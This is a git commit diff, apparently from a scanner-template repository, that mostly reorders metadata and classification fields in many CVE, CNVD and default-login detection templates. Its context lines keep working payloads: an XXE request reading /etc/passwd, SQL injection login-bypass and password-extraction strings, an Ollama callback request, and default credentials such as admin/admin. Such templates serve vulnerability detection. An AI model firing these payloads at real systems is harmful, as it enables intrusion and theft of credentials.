Fix classification

2024-09-10 14:38:16 +05:30 · 2024-09-10 14:38:16 +05:30 · 7d276ebee0
parent b2e470c37e
commit 7d276ebee0
668 changed files with 4127 additions and 3767 deletions
--- a/http/cnvd/2020/CNVD-2020-63964.yaml
+++ b/http/cnvd/2020/CNVD-2020-63964.yaml
@ -8,16 +8,16 @@ info:
    jshERP that can reveal sensitive information including system credentials without credentials.
  reference:
    - https://cn-sec.com/archives/1798444.html
-  metadata:
-    max-request: 1
-    shodan-query: http.favicon.hash:-1298131932
-    fofa-query: jshERP-boot
-    product: jsherp
-    vendor: jishenghua
-  tags: cnvd,cnvd2020,jsherp,disclosure
-
  classification:
    cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: jishenghua
+    product: jsherp
+    shodan-query: http.favicon.hash:-1298131932
+    fofa-query: jshERP-boot
+  tags: cnvd,cnvd2020,jsherp,disclosure
+
 http:
  - method: GET
    path:
@ -40,4 +40,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950
--- a/http/cnvd/2021/CNVD-2021-15822.yaml
+++ b/http/cnvd/2021/CNVD-2021-15822.yaml
@ -8,17 +8,17 @@ info:
    ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
  reference:
    - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
+  classification:
+    cpe: cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
+    vendor: shopxo
+    product: shopxo
    shodan-query: title:"ShopXO企业级B2C电商系统提供商"
    fofa-query: app="ShopXO企业级B2C电商系统提供商"
-    product: shopxo
-    vendor: shopxo
  tags: cnvd2021,cnvd,shopxo,lfi

-  classification:
-    cpe: cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -35,4 +35,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950
--- a/http/cnvd/2022/CNVD-2022-43245.yaml
+++ b/http/cnvd/2022/CNVD-2022-43245.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
+  classification:
+    cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: app="泛微-协同办公OA"
-    product: e-office
    vendor: weaver
+    product: e-office
+    fofa-query: app="泛微-协同办公OA"
  tags: cnvd,cnvd2022,weaver,e-office,oa,lfi

-  classification:
-    cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -44,4 +44,4 @@ http:
        status:
          - 200

-# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950
--- a/http/cnvd/2024/CNVD-2024-15077.yaml
+++ b/http/cnvd/2024/CNVD-2024-15077.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    - https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md
+  classification:
+    cpe: cpe:2.3:a:anji-plus:aj-report:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: title="AJ-Report"
-    product: aj-report
    vendor: anji-plus
+    product: aj-report
+    fofa-query: title="AJ-Report"
  tags: cnvd,cnvd2024,aj-report,rce

-  classification:
-    cpe: cpe:2.3:a:anji-plus:aj-report:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -46,4 +46,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2023/CVE-2023-42344.yaml
+++ b/http/cves/2023/CVE-2023-42344.yaml
@ -10,28 +10,30 @@ info:
  reference:
    - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
    - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
+  classification:
+    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    fofa-query: "OpenCms-9.5.3"
-    product: opencms
    vendor: alkacon
+    product: opencms
+    fofa-query: "OpenCms-9.5.3"
  tags: cve,cve2023,xxe,opencms

-  classification:
-    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
 http:
  - method: POST
    path:
      - "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
      - "{{BaseURL}}/cmisatom/cmis-online/query"
+
    headers:
      Content-Type: "application/xml;charset=UTF-8"
      Referer: "{{RootURL}}"
+
    body: |
      <?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
-
    stop-at-first-match: true
+
    matchers-condition: and
    matchers:
      - type: regex
@ -40,4 +42,5 @@ http:
          - "root:.*:0:0:"
          - "invalidArgument"
        condition: and
-# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-27564.yaml
+++ b/http/cves/2024/CVE-2024-27564.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://github.com/dirk1983/chatgpt/issues/114
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27564
+  classification:
+    cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    fofa-query: "title=\"ChatGPT个人专用版\""
-    product: chatgpt_web
    vendor: chanzhaoyu
+    product: chatgpt_web
+    fofa-query: "title=\"ChatGPT个人专用版\""
  tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi

-  classification:
-    cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -42,4 +42,5 @@ http:
          - contains(header, "image/jpeg")
          - status_code == 200
        condition: and
-# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-33288.yaml
+++ b/http/cves/2024/CVE-2024-33288.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://en.0day.today/exploit/39610
    - https://www.sourcecodester.com/sql/17287/prison-management-system.html
+  classification:
+    cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: title:"Prison Management System"
-    product: prison_management_system
    vendor: prison_management_system_project
+    product: prison_management_system
+    shodan-query: title:"Prison Management System"
  tags: cve,cve2024,cms,sqli

-  classification:
-    cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -27,7 +27,6 @@ http:
        Content-Type: application/x-www-form-urlencoded

        txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=
-
      - |
        GET /Admin/index.php HTTP/1.1
        Host: {{Hostname}}
@ -44,4 +43,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-34982.yaml
+++ b/http/cves/2024/CVE-2024-34982.yaml
@ -10,18 +10,16 @@ info:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
+  classification:
+    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: icon_hash="-282504889"
-    product: lylme_spage
    vendor: lylme
+    product: lylme_spage
+    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive
-
-  classification:
-    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
 flow: http(1) && http(2)
-
 variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"
@ -73,4 +71,5 @@ http:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
-# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-3552.yaml
+++ b/http/cves/2024/CVE-2024-3552.yaml
@ -10,20 +10,18 @@ info:
  reference:
    - https://vulners.com/wpvulndb/CVE-2024-3552
    - https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/
+  classification:
+    cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
-    publicwww-query: "/wp-content/plugins/web-directory-free"
-    product: web_directory_free
    vendor: salephpscripts
+    product: web_directory_free
+    publicwww-query: "/wp-content/plugins/web-directory-free"
  tags: cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free
-
-  classification:
-    cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:*
 flow: http(1) && http(2)

 http:
-
  - raw:
      - |
        GET / HTTP/1.1
@ -51,4 +49,5 @@ http:
          - 'status_code == 200'
          - regex('^\[\]$', body)
        condition: and
-# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-36837.yaml
+++ b/http/cves/2024/CVE-2024-36837.yaml
@ -9,16 +9,15 @@ info:
  reference:
    - https://github.com/phtcloud-dev/CVE-2024-36837
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36837
+  classification:
+    cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: title="CRMEB"
-    product: crmeb
    vendor: crmeb
+    product: crmeb
+    fofa-query: title="CRMEB"
  tags: cve,cve2024,crmeb,sqli
-
-  classification:
-    cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*
 variables:
  num: "{{rand_int(9000000, 9999999)}}"

@ -44,4 +43,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-37032.yaml
+++ b/http/cves/2024/CVE-2024-37032.yaml
@ -10,16 +10,16 @@ info:
    - https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
    - https://nvd.nist.gov/vuln/detail/CVE-2024-37032
    - https://github.com/Bi0x/CVE-2024-37032
+  classification:
+    cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: ollama
-    product: ollama
    vendor: ollama
+    product: ollama
+    shodan-query: ollama
  tags: cve,cve2024,ollama,rce

-  classification:
-    cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -28,7 +28,6 @@ http:
        Content-Type: application/json

        {"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true}
-
      - |
        POST /api/push HTTP/1.1
        Host: {{Hostname}}
@ -42,4 +41,5 @@ http:
          - contains(interactsh_protocol, 'http')
          - contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')
        condition: and
-# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-37152.yaml
+++ b/http/cves/2024/CVE-2024-37152.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://github.com/argoproj/argo-cd/security/advisories/GHSA-87p9-x75h-p4j2
    - https://nvd.nist.gov/vuln/detail/CVE-2024-37152
+  classification:
+    cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: html:"Argo CD"
-    product: argo_cd
    vendor: argoproj
+    product: argo_cd
+    shodan-query: html:"Argo CD"
  tags: cve,cve2024,argo-cd,info-leak

-  classification:
-    cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -42,4 +42,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-38289.yaml
+++ b/http/cves/2024/CVE-2024-38289.yaml
@ -8,16 +8,16 @@ info:
    A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
  reference:
    - https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v
+  classification:
+    cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: html:"TurboMeeting"
-    product: turbomeeting
    vendor: rhubcom
+    product: turbomeeting
+    shodan-query: html:"TurboMeeting"
  tags: cve,cve2024,sqli,turbomeeting

-  classification:
-    cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -26,7 +26,6 @@ http:
        Content-Type: application/x-www-form-urlencoded

        meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
-
      - |
        POST /as/wapi/vmp HTTP/1.1
        Host: {{Hostname}}
@ -45,4 +44,5 @@ http:
        part: body_2
        words:
          - '<__Status__>FAILED</__Status__>'
-# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-3922.yaml
+++ b/http/cves/2024/CVE-2024-3922.yaml
@ -13,16 +13,15 @@ info:
  reference:
    - https://dokan.co/docs/wordpress/changelog/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3922
+  classification:
+    cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 2
-    publicwww-query: "/wp-content/plugins/dokan-pro/"
-    product: dokan
    vendor: wedevs
+    product: dokan
+    publicwww-query: "/wp-content/plugins/dokan-pro/"
  tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli
-
-  classification:
-    cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:*
 flow: http(1) && http(2)

 http:
@ -51,4 +50,5 @@ http:
          - 'duration>=6'
          - 'status_code == 302'
        condition: and
-# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-6781.yaml
+++ b/http/cves/2024/CVE-2024-6781.yaml
@ -8,17 +8,17 @@ info:
    Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
-  metadata:
-    shodan-query: html:"Calibre"
-    fofa-query: "Server: calibre"
-    verified: true
-    max-requeset: 1
-    product: calibre
-    vendor: calibre-ebook
-  tags: cve,cve2024,calibre,lfi
-
  classification:
    cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    vendor: calibre-ebook
+    product: calibre
+    shodan-query: html:"Calibre"
+    fofa-query: "Server: calibre"
+    max-requeset: 1
+  tags: cve,cve2024,calibre,lfi
+
 http:
  - raw:
      - |
@ -57,4 +57,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-6782.yaml
+++ b/http/cves/2024/CVE-2024-6782.yaml
@ -8,17 +8,17 @@ info:
    Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
+  classification:
+    cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
  metadata:
    verified: true
+    vendor: calibre-ebook
+    product: calibre
    shodan-query: html:"Calibre"
    fofa-query: "Server: calibre"
    max-requeset: 1
-    product: calibre
-    vendor: calibre-ebook
  tags: cve,cve2024,calibre,rce

-  classification:
-    cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -63,4 +63,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-6922.yaml
+++ b/http/cves/2024/CVE-2024-6922.yaml
@ -12,6 +12,8 @@ info:
    - https://www.automationanywhere.com/products/automation-360
    - https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6922
+  classification:
+    cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
@ -21,8 +23,7 @@ info:
    vendor: automationanywhere
  tags: cve,cve2024,ssrf,oast,automation,anywhere

-  classification:
-    cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:*
+
 http:
  - raw:
      - |
--- a/http/default-logins/apache/apache-apollo-default-login.yaml
+++ b/http/default-logins/apache/apache-apollo-default-login.yaml
@ -4,16 +4,15 @@ info:
  name: Apache Apollo - Default Login
  author: ritikchaddha
  severity: high
+  classification:
+    cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"Apache Apollo"
-    product: activemq_apollo
    vendor: apache
+    product: activemq_apollo
+    shodan-query: title:"Apache Apollo"
  tags: apache,apollo,default-login,misconfig
-
-  classification:
-    cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
 variables:
  username: 'admin'
  password: 'admin'
@ -26,7 +25,6 @@ http:
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}
-
      - |
        GET /console/index.html HTTP/1.1
        Host: {{Hostname}}
@ -49,4 +47,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/apache/cloudstack-default-login.yaml
+++ b/http/default-logins/apache/cloudstack-default-login.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    CloudStack instance discovered using weak default credentials, allows the attacker to gain admin privilege.
+  classification:
+    cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.title:"Apache CloudStack"
-    product: cloudstack
    vendor: apache
+    product: cloudstack
+    shodan-query: http.title:"Apache CloudStack"
  tags: default-login,apache,cloudstack

-  classification:
-    cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -27,13 +27,11 @@ http:
        command=login&username={{username}}&password={{password}}&domain=%2F&response=json

    attack: pitchfork
-
    payloads:
      username:
        - admin
      password:
        - password
-
    host-redirects: true
    matchers:
      - type: dsl
@ -42,4 +40,5 @@ http:
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'sessionkey','domainid','userid')"
        condition: and
-# digest: 4a0a00473045022100e14781f645e94e9addfd689f626c0fd7410a4c6abab76c419506a12a7e77b3c702203e536f8fc02f29d3744e77e3403890bbb63998656b7582421280bb32f31466a9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e14781f645e94e9addfd689f626c0fd7410a4c6abab76c419506a12a7e77b3c702203e536f8fc02f29d3744e77e3403890bbb63998656b7582421280bb32f31466a9:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/apache/kylin-default-login.yaml
+++ b/http/default-logins/apache/kylin-default-login.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml
    - https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker
+  classification:
+    cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
-    fofa-query: app="APACHE-kylin"
-    product: kylin
    vendor: apache
+    product: kylin
+    fofa-query: app="APACHE-kylin"
  tags: kylin,default-login,apache

-  classification:
-    cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -56,4 +56,4 @@ http:
        status:
          - 200

-# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/apache/tomcat-default-login.yaml
+++ b/http/default-logins/apache/tomcat-default-login.yaml
@ -8,15 +8,15 @@ info:
  reference:
    - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
    - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
-  metadata:
-    max-request: 405
-    shodan-query: title:"Apache Tomcat"
-    product: tomcat
-    vendor: apache
-  tags: tomcat,apache,default-login
-
  classification:
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 405
+    vendor: apache
+    product: tomcat
+    shodan-query: title:"Apache Tomcat"
+  tags: tomcat,apache,default-login
+
 http:
  - raw:
      - |
@ -98,4 +98,4 @@ http:
        status:
          - 200

-# digest: 4a0a00473045022100e2f0325cd0d99bcd7a23cd738065048220ea18532e54ce329ccfb3bb44866d9602202efadadca274034c7078a8104fc4df513dba2c17d33d76d104490d8cd85db915:922c64590222798bb761d5b6d8e72950
